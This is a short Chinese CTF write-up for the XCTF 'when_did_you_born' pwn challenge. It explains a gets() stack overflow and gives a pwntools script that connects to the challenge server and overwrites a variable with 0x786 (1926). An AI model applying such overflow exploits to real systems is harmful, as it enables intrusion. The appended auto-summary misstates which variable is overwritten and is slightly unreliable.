[攻防世界 pwn]——when_did_you_born
- 题目地址: https://adworld.xctf.org.cn/
- 题目:

checksec看下 64位

IDA中,只要v5最初不是1926,之后改为1926就可以了。利用gets栈溢出就好v4与v5相差0x20 -0x18


exploit
from pwn import *
#p = process("./pwn")
p = remote("111.200.241.244",58101)
p.sendlineafter("What's Your Birth?\n", '2001')
payload = 'a' * 8 + p64(0x786)
p.sendlineafter("What's Your Name?", payload)
p.interactive()
该博客介绍了CTF比赛中的一道题目,涉及64位系统的checksec和栈溢出漏洞利用。通过IDA分析,只要在输入时将变量v5设置为1926,然后利用gets函数导致栈溢出来改变v4的值,即可成功解决挑战。提供的exploit代码展示了如何发送特定的payload来完成这一操作。
320

被折叠的 条评论
为什么被折叠?



